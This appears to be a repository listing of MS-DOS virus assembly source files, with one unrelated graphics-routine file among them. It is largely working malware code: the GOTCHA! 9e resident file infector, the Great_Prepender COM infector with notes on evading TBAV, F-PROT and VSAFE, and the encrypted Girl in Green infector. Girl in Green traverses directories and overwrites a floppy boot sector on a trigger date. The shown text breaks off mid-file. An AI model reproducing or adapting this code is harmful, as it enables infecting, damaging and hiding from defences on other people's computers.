pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

571
MSDOS/Virus.MSDOS.Unknown.gotcha9e.asm Normal file
View File

@ -0,0 +1,571 @@
;****************************************************************************
;* GOTCHA! Version 9e
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ end - begin
RESPAR equ (FILELEN/16) + 17
VERSION equ 9
BUFLEN equ 20h
COMSIGN equ 0
EXESIGN equ 1
MINTARGET equ 1000
MAXTARGET equ -FILELEN
.RADIX 16
;****************************************************************************
;* Start the program!
;****************************************************************************
begin: xor bx,bx
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?,?
nameptr dw ?,?
handle dw ?
comexe db ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE'
COM_txt db 'COM'
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,0DADAh ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ax,6C00h ;open/create 4.00 ?
je do_6C00
cmp ah,56h ;rename ?
je doit
cmp ah,4Eh ;findfirst ?
je doit ;(only works without wildcards)
cmp ah,4Bh ;load / execute ?
je doit
cmp ah,43h ;attributes
je doit
cmp ah,41h ;delete ?
je doit ;(it might be un-deleted!)
cmp ah,3Dh ;open ?
je do_3D
cmp ah,17h ;FCB-rename?
je doFCB
cmp ah,13h ;FCB-delete?
jne exit
doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's!
doit: call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_3D: test al,03h ;only if opened for READING
jne exit
jmp short doit
do_6C00: test bl,03h ;idem
jne exit
mov dx,di ;ptr was DS:DI
jmp short doit
do_DADA: mov ax,0A500h+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Old Interupt handler 21
;****************************************************************************
org21: pushf
call dword ptr cs:[oi21] ;call to old int-handler
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov cs:[nameptr],dx ;save the ptr to the filename
mov cs:[nameptr+2],ds
mov ah,62h ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov ax,ds:002Ch
mov ds,ax
mov si,0
envloop: cmp ds:[si],byte ptr 0 ;end of environment?
je verder7
push cs
pop es
mov di,offset envstring
mov bx,0
scloop: mov al,ds:[si] ;check the current env-item
cmpsb
je scv1
inc bx ;characters don't match!
scv1: cmp al,0 ;end of env-item?
jne scloop
cmp bx,0 ;did all characters match?
je return
jmp short envloop
verder7: push cs ;check the filename
pop ds
les di,dword ptr [nameptr]
mov dx,di
mov cx,80 ;search end of filename (-EXT)
mov al,'.'
repnz scasb
mov bx,di
std ;find begin of filename
mov cl,11
mov al,'\'
repnz scasb
cld
je vvv
mov di,dx
jmp short vvv2
vvv: add di,2
vvv2: mov al,'V' ;is it V*.* ?
scasb
je return
mov cl,7 ;is it *AN*.* ?
mov ax,'NA'
ANloop: dec di
scasw
loopnz ANloop
je return
mov si,offset EXE_txt ;is extension 'EXE'?
mov di,bx
mov cx,3
rep cmpsb
jnz verder4
mov byte ptr [comexe],EXESIGN
jmp short verder3
return: ret
verder4: mov si,offset COM_txt ;is extension 'COM'?
mov di,bx
mov cx,3
rep cmpsb
jnz return
mov byte ptr [comexe],COMSIGN
verder3: mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;get file-attribute
mov ax,4300h
call org21
push cx
and cx,0F8h ;clear READ-ONLY-flag
call setattr
jc return1_v
push cs ;open the file
pop ds
lds dx,dword ptr [nameptr]
mov ax,3D02h
int 21
jnc verder2
return1_v: jmp return1 ;something went wrong... :-(
verder2: push cs ;save handle
pop ds
mov [handle],ax
mov bx,[handle] ;get file date & time
mov ax,5700h
int 21
push cx
push dx
call endptr ;get file-length
mov [oldlen],ax
mov [oldlen+2],dx
sub ax,SIGNLEN ;move ptr to end - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
mov cx,SIGNLEN ;read the last bytes
mov dx,offset buffer
call flread
jc return2_v
push cs ;compare bytes with signature
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin


93
MSDOS/Virus.MSDOS.Unknown.graflib.asm Normal file
View File

@ -0,0 +1,93 @@
;
; grafix --- graflib.asm
;
; miscellaneous assembly routines
;
; Written 4/87 by Scott Snyder (ssnyder@romeo.caltech.edu or @citromeo.bitnet)
;
; Modified 5/29/87 by sss to allow for different memory models
;
title graflib
include macros.ah
buflen equ 32768
sseg
endss
dseg
endds
buf segment public 'BUF'
db buflen dup(?)
buf ends
cseg _graflib
pBegin g_bufseg
mov ax, buf
ret
pEnd g_bufseg
pBegin g_fmemcpy
push bp
mov bp,sp
push di
push si
push ds
cld
les di,[bp+argbase]
lds si,[bp+argbase+4]
mov cx,[bp+argbase+8]
shr cx, 1
jnc c1
movsb
c1: rep movsw
pop ds
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemcpy
pBegin g_fmemset
push bp
mov bp,sp
push di
push si
cld
les di,[bp+argbase]
mov al,[bp+argbase+4]
mov ah,al
mov cx,[bp+argbase+6]
shr cx,1
jnc s1
stosb
s1: rep stosw
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemset
df_ g_fmemcpy
df_ g_fmemset
df_ g_bufseg
endcs _graflib
end

183
MSDOS/Virus.MSDOS.Unknown.greatpre.asm Normal file
View File

@ -0,0 +1,183 @@
;******************************************************************************
;
; "I'm the great prepender!" - Jest on Queen by Rajaat / Genesis
;
;******************************************************************************
;
; Virus name : Great_Prepender
; Author : Rajaat
; Origin : United Kingdom, December 1995
; Compiling : Using TASM | Using A86
; |
; TASM /M PREPEND | A86 PREPEND.ASM
; TLINK /T PREPEND |
; Targets : COM files
; Size : 144 bytes
; Resident : No
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : No - is not needed for some programs
; Retrovirus : Yes - TBAV, SUSPICIOUS, F-PROT & VSAFE
; Antiheuristics: Yes - TBAV, SUSPICIOUS & F-PROT
; Peculiarities : Shifts the whole file after the virus code
; Rewrites the whole file for infection
; Avoids TBAV & SUSPICIOUS using a 2 byte signature
; Drawbacks : Hangs if host is TSR program
; Hangs if host jumps to PSP:0
; Needs at least 64k free space after host
; Behaviour : When a COM file infected with Great_Prepender virus is
; executed, the virus will search for a COM file in the
; current directory that doesn't have a 0 in the seconds
; field of the file date/time. The virus will read the entire
; file in a block after the current host. Great_Prepender now
; creates a new file with the same name and writes itself at
; the start of the file, and appends the rest of the host
; behind it's own code, thus effectively shifting the whole
; host with 144 bytes. The virus will restore the host in a
; very peculiar way. It modifies the segment registers in a
; way that the host looks if it's aligned at 100h, the normal
; address for COM files to start. It then copies most of the
; DTA over it's own code and executes the host. The stack
; segment is not modified. Because the virus shifts only the
; DTA and doesn't change the memory allocation, resident
; programs have a chance of crashing, because they don't
; allocate 144 bytes of their own code (if function 31h is
; used for the allocation). Great_Prepender is targetted at
; a few resident behaviour blockers, effectively avoiding them.
; The virus also has some tricks to avoid being scanned by a
; few antivirus programs that can perform heuristic scanning.
; It's unknown what this virus might do besides replicate :)
;******************************************************************************
;
; Results with antivirus software
;
; TBFILE - doesn't trigger
; TBSCAN - flags 'p' (packed file)
; TBCLEAN - can't reconstruct without ANTIVIR.DAT
; SVS - doesn't trigger
; SSC - no flags
; F-PROT - no virus found
; F-PROT /ANALYSE - no virus found
; F-PROT /ANALYSE /PARANOID - unusual code
; AVP - virus type Com suspicion (0 bytes)
; VSAFE - doesn't trigger
; NEMESIS - triggers :(
;
;******************************************************************************
;
; Big hello to : Immortal Riot, VLAD, Phalcon/Skism and everyone on #virus who
; deserves it to be greeted by me.
;
;******************************************************************************
.model tiny
.code
org 100h
dta equ 0fd00h-1eh
;===( Main part of the virus )=================================================
im_the_great_prepender:
push ax ; fool TBSCAN and SSC
dec bx
xchg ax,cx
mov ah,1ah
mov dx,dta
int 21h ; move dta to end of segment
mov ah,4eh
find_next: lea dx,filemask
int 21h ; search COM file
jc restore_host ; go restore_host if seek fails
mov ah,4fh
test byte ptr ds:dta+16h,00011111b
jz find_next ; if seconds != 0 go find_next
;===( Infect file )============================================================
mov ah,3dh
mov dx,dta+1eh
int 21h ; open file with read access
xchg ax,bx
xchg ax,cx
push ds
pop ax
add ah,10h
push ax
push ax
pop ds
mov ah,3fh
cwd ; read whole file in next
int 21h ; 64k block
push ax ; store file size
push cs
pop ds
mov ah,3eh
int 21h ; close file
mov ah,3ch
mov dh,0fdh
inc cx
int 21h ; create new file (overwrite)
mov ah,40h
mov dh,01h
mov cl,virus_size
int 21h ; write virus
mov ah,40h
pop cx
pop ds
cwd
int 21h ; write host
push cs
pop ds
mov ax,5701h
mov cx,word ptr ds:dta+16h
mov dx,word ptr ds:dta+18h
and cl,11100000b ; set seconds to 0 and
int 21h ; restore date/time
mov ah,3eh
int 21h ; close file
;===( Return to host )=========================================================
restore_host: push cs ; shift the segment
pop si ; and prepare for dta
add si,09h ; transfer.
push si
push si
mov di,100h-(virus_end-reconstruct)
mov cx,di
push di
push si
pop es
xor si,si
mov di,si
mov dx,80h
retf ; jump to new cs:ip (shifted)
filemask db '*Rajaat.COM',0 ; file mask and author name
reconstruct: rep movsb ; copy dta to new location
pop ds ; (over virus code)
mov ah,1ah
int 21h ; set new dta
pop ax ; clear ax
virus_end equ $
virus_size equ $-im_the_great_prepender
;===( Original shifted host )==================================================
mov ax,4c00h
int 21h
end im_the_great_prepender

673
MSDOS/Virus.MSDOS.Unknown.green.asm Normal file
View File

@ -0,0 +1,673 @@
GREEN_GIRL SEGMENT
;
; The "Girl in Green" Virus by The Methyl-Lated Spirit
;
; Alright, here is the low-down on this virus.
; - XOR and NOT encryption
; - Boot block message display <see below>
; - .EXE and .COM infection <in that order>
; - Direct Action <I SWEAR the next will be TSR>
; - INT 042H Handler
; - Teensy weensy little bit of anti-debugging shit
; - Neat activation <boot block, see below>
; - Directory Traversal
; - Restores original Date/Time/Attributes
; - Won't infect Windows .EXE's
; - Won't fuck up too often because of extensive testing of it
;
; A short note on the boot block:
;
; This virus has a boot block, yes, thats right, a boot block!
; On July the 3rd, MY birthday, it will capture a picture of the first
; sector of the disk in A: into a file on the A: called boot.sec, then
; it will overwrite the original bootblock with some code, and when you
; re-boot onto that disk... well, I'll let you see yourself <it aint
; destructive, and that boot.sec is there in case you wanna restore it,
; aren't I a nice guy? *G*>. It was made originally for EGA, but should
; work on other monitors too, although the colours may be weird.
;
; Basically, there is no easy way to go through this virus. It is
; a great desendant from Spaghetti <yes, the food>. It jumps here, there
; everywhere, and, well, I don't believe I've created such a monster.
; Here is a little look see at it. It goes through 2 phases determined
; by the run_count counter. A setting of 1 means it is the first time through
; and that it should look for .EXE files to infect. After that, it is set to
; 2 and it searches for .COM files to infect. It will only infect 1 file on
; each run. After that, when it goes to restart the host, it looks at the
; com_or_exe variable. A setting of 1 means the current file is a .EXE and
; should be restored in that way, and a setting of 2 means the current file
; is a .COM file and should be restored as such. These variables are
; temporarily changed while writing the virus to a new file to reflect
; the hosts new attributes.
;
; Dedications:
; - The knock-out babe on the 424 bus home from school every day
;
; Big time fuck you's to:
; - Peter Doyle. FACE IT! COMPUSERVE SUX!
; - Dick Smith's Shops. HAHAHAHA, THE TOILET BOWL VIRUS STRIKES AGAIN!
; - MYER stores in Perth
; "If you do not remove yourself from that computer, I
; shall have to call security". HAHAHAHAHAHAHAHAHAHA
; - Deth : MYER was fun, but you are a liar and a theif, FUCK YOU
; : You don't NARK on people you did a B&E with just because
; : you're having PMS, get a life arsehole. Liquid Plastic SUX.
;
; Greets to:
; - Ral : Techno roqs just about as much as Jim Morrison
; - Grey : Thanx for the chats dude
; - Rainbow Bright/Telco Ray : Haven't seen u on the net laterly!
; - Shalazar : What is there to say? You're a dude.
; - Titanium Warrior : I'm gunna get you!
; - And all those wonderfull people in GrayLands that gave me this nice
; padded cell so I wouldn't bang my head to hard on the walls
; when I got frustrated debugging this thing :)
;
; Sources:
; - Much code from my first virus, The Toilet Bowl
; - VLAD, the info on how to check for WinEXE files
; - 40-hex article by Dark Avenger on .EXE infections
; - 40-hex article on how boot-sectors work <I just needed
; the offset in memory where they are loaded, 0:7C00>
;
; Reasons for writing it:
; If you're wondering why this is called the "Girl in Green" virus, well, here
; is the answer. I am Methyl, hanging on #AUSSIES alot, and I met a
; BEAUTIFUL girl on da bus, and she was dressed in her green school uniform.
; Well, I'm, of course, gunna ask her out when I get sum guts, but first
; I thought I'd be really kind and create a virus to show my love for her! :>
;
; So if you <you know who you are> were wearing a slazenger suit into
; Karrinyup on Mothers Day, and a phreak in white with the wierdest
; pair of jeans in the world on came up to you and said "Hello", then,
; I LOVE YOU! <evil grin>
;
ORG 0H ;
;
START: ; Host file
MOV AH,4CH ;
INT 21H ;
;
BEGIN: ;
MOV AH,1 ; TbAV will go no further :)
INT 016H ;
;
JMP $+3 ; Stop F-PROT flagging this as a virus
DB 081H, 0E8H, 00H, 00H ;
;
GET_DELTA: ;
MOV BP,SP ;
SUB WORD PTR [SS:BP], OFFSET GET_DELTA
MOV AX,[SS:BP] ;
ADD SP,2 ;
MOV BP,AX ;
;
PUSH DS ; Save PSP segment
PUSH ES ;
MOV DS,CS ; Make ES=DS=CS
MOV ES,DS ;
;
; I've done a little thing here that makes this baby easier to compile.
; When first compiled, the variable enc_or_not will equal 0, and so the
; encrypting routines shan't be run, because the virus has not yet encrypted
; itself. After the first run, this value is changed forever to be 1, so that
; encryption is always carried out on the new infected files. It takes up a
; bit of space, but, like I said, easier to compile.
;
;
CMP BYTE PTR [OFFSET ENC_OR_NOT+BP], 0
JE START_XOR ;
; Call encryption routines
CALL NOTTER ;
CALL XORER ;
;
START_XOR: ; Begin XOR'ing here
MOV BYTE PTR [OFFSET ENC_OR_NOT+BP], 1
; Determine which method will be used later
; to jump back to host, and restores the
; appropriate host bytes.
CMP BYTE PTR [OFFSET COM_OR_EXE+BP], 1
JE EXE_BYTES ;
; This will restore .COM files
LEA SI,[OFFSET ORIG_3+BP]
MOV DI,0100H ;
MOVSB ;
MOVSB ;
MOVSB ;
JMP RESET ;
;
EXE_BYTES: ; This is for .EXE's
MOV WORD PTR [ORIG_CSIP+BP], WORD PTR [TEMP_CSIP+BP]
MOV WORD PTR [ORIG_SSSP+BP], WORD PTR [TEMP_SSSP+BP]
MOV WORD PTR [ORIG_CSIP+BP+02H], WORD PTR [TEMP_CSIP+BP+02H]
MOV WORD PTR [ORIG_SSSP+BP+02H], WORD PTR [TEMP_SSSP+BP+02H]
;
RESET: ; Reset run counter
MOV BYTE PTR [OFFSET RUN_COUNT+BP],1
;
SET_NEW_DTA: ; Make a new DTA
MOV AH, 01AH ;
LEA DX, OFFSET NEW_DTA_AREA+BP
INT 021H ;
;
SAVE_CURRENT_DIR: ; Save current directory for traversal functions
MOV AH, 047H ;
XOR DL, DL ;
LEA SI, OFFSET DIR_BUFFER+BP
INT 021H ;
;
SET_ERRORS: ; Make a new error handler to stop
; write protect errors propping up.
MOV AX, 03524H ;
INT 21H ;
;
LEA DI, OFFSET OLD_ERROR+BP
MOV [DI],ES ;
ADD DI,2 ;
MOV [DI],BX ;
;
MOV AX,02524H ;
LEA DX, OFFSET NEW_ERROR_HANDLER+BP
INT 21H ;
;
MOV ES, DS ; Restore modified ES register
; *********************************************************************
; Activation routine for July 3rd.
;
;
MOV AH, 02AH ; Get date
INT 21H ;
;
MONTH: ;
CMP DH, 07H ; Check if it is July
JE DAY ;
JMP DATE_TEST_PASSED ;
;
DAY: ;
CMP DL, 03H ; Check if it is the 3rd
JE BOOTER ;
JMP DATE_TEST_PASSED ;
; If it got to this point, ITS MY BIRTHDAY!
BOOTER: ;
MOV AX,0201H ; Read old boot block data
MOV CX,1 ;
XOR DX,DX ;
LEA BX,OFFSET OLD_DATA+BP;
INT 013H ;
;
MOV AH,03CH ; Create A:\BOOT.SEC
XOR CX,CX ;
LEA DX,OFFSET BOOT_NAME+BP
INT 21H ;
;
JC QUIT ; Disk not there maybe?
;
XCHG BX,AX ; Write A:\BOOT.SEC
MOV AH,040H ;
MOV CX,512 ;
LEA DX,OFFSET OLD_DATA+BP
INT 021H ;
;
MOV AH,03EH ;
INT 021H ; Close file with boot sector inside
;
MOV AX,0301H ; Write new boot sector to floppy
MOV CX,1 ;
XOR DX,DX ;
LEA BX, OFFSET START_WRITE+BP
INT 13H ;
;
QUIT: ; Reboot computer to load up new boot segment
MOV AX,040H ; Set up for a warm reboot <quicker>
MOV DS,AX ;
MOV AX, 012H ;
MOV [072H], AX ;
;
DB 0EAH ; Do a jump to Offset:Segment following
DB 00,00,0FFH,0FFH ; which is FFFF:0000 as segment:offset
;
;***********************************************************************
; This is the boot_block start
START_WRITE: ;
CLD ;
;
NO_CURSOR: ;
MOV AH,1 ;
MOV CX,02000H ;
INT 010H ;
;
MOV AX,0B800H ; Colour video segment
MOV ES,AX ;
XOR DI,DI ;
LEA SI, 07C00H+(OFFSET MESSAGE-OFFSET START_WRITE)
;
LOOPY_GREEN: ;
MOV CX, 23 ;
REP MOVSW ;
SUB SI, 46 ;
LEA AX, 07C00H+(OFFSET LOOPY_GREEN-OFFSET START_WRITE)
JMP AX ;
;
MESSAGE DB 'I',02,32 ,02,03 ,02,32 ,02,'Y',02,'O',02,'U',02,32,02
DB 'G',02,'I',02,'R',02,'L',02,32 ,02,'I',02,'N',02
DB 32 ,02,'G',02,'R',02,'E',02,'E',02,'N',02,'!',02,32,02
;
; This is the boot_block end
;***********************************************************************
;
DATE_TEST_PASSED: ; Find first file
MOV AH,04EH ;
JMP FINDER ;
;
CHANGE_DIR: ; Go down in directory structure
MOV AH,03BH ;
LEA DX,OFFSET CHANGE_TO+BP
INT 021H ;
JC END_ALL ; In root, no more files
;
MOV AH,04EH ; Since it is is a new dir, find first file
JMP FINDER ;
;
RESET_ATTRIBS: ; Reset file time/date
MOV AX,05701H ;
MOV CX,[OFFSET TIME+BP] ;
MOV DX,[OFFSET DATE+BP] ;
INT 021H ;
RET ;
;
CLOSE_FILE: ; Close file and reset attributes
MOV AH,03EH ;
INT 021H ;
;
MOV AX,04301H ;
MOV CX,[OFFSET ATTRIBS+BP]
LEA DX,OFFSET NEW_DTA_AREA+1EH+BP
INT 021H ;
RET ;
;
FINDER: ; Find first/next routine
LEA DX,[OFFSET FILE_MASK+BP]
MOV CX,0007H ;
INT 021H ;
;
JC CHANGE_DIR ; Change dir if no more files
JMP FILE_FOUND ;
;
DO_OTHER: ; Change file mask. This is the 2nd
; pass, so look for .COM's instead of .EXE's
MOV BYTE PTR [OFFSET RUN_COUNT+BP],2
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'OC'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'M'
MOV AH,04EH ;
JMP FINDER ;
;
END_ALL: ;
MOV AH,03BH ; Change to original dir
LEA DX,OFFSET SLASH+BP ;
INT 021H ;
; Do second pass if not done already
CMP BYTE PTR [OFFSET RUN_COUNT+BP], 1
JE DO_OTHER ;
;
; Reload original error handler
MOV DX,[OFFSET OLD_ERROR+BP+02H]
MOV DS,[OFFSET OLD_ERROR+BP]
MOV AX,02524H ;
INT 021H ;
;
POP ES ; Reload original DS, ES
POP DS ;
; Determine host file type
CMP BYTE PTR [OFFSET COM_OR_EXE+BP],1
JE EXE_RESTORE ;
;
MOV AH,01AH ; This will restore a .COM file
MOV DX,080H ;
INT 021H ;
;
MOV DX,0100H ;
JMP DX ;
;
EXE_RESTORE: ; This will restore a .EXE file
;
MOV AH,1AH ; Reset original PSP
MOV DX,080H ;
INT 021H ;
;
MOV AX,ES ; Get CS:IP ready to jump to
ADD AX,010H ;
ADD WORD PTR CS:[BP+ORIG_CSIP+02H],AX
ADD AX, WORD PTR CS:[BP+ORIG_SSSP+02H]
;
CLI ; Restore stack segment and stack pointer
MOV SP, WORD PTR CS:[BP+ORIG_SSSP]
MOV SS,AX ;
STI ;
;
DB 0EAH ; Far Jump Offset:Segment following
;
;***************************************************************************
; Data area
;
ORIG_CSIP DW 0,0 ; Original CS:IP value
ORIG_SSSP DW 0,0 ; Original SS:SP value
;
TEMP_CSIP DW 0,0 ; Temporary CS:IP value
TEMP_SSSP DW 0,0 ; Temporary SS:SP value
;
CHANGE_TO DB '..',0 ; For directory traversal functions
FILE_MASK DB '*.EXE',0 ; File mask <DUH!>
;
BOOT_NAME DB 'A:\BOOT.SEC',00 ; Holds original boot sector of a diskette
;
COM_OR_EXE DB 1 ; 1=exe, 2=com
RUN_COUNT DB 1 ; 1=first, 2=second
;
JUMPING DB 0E9H,00,00 ; Jump construct for a .COM file
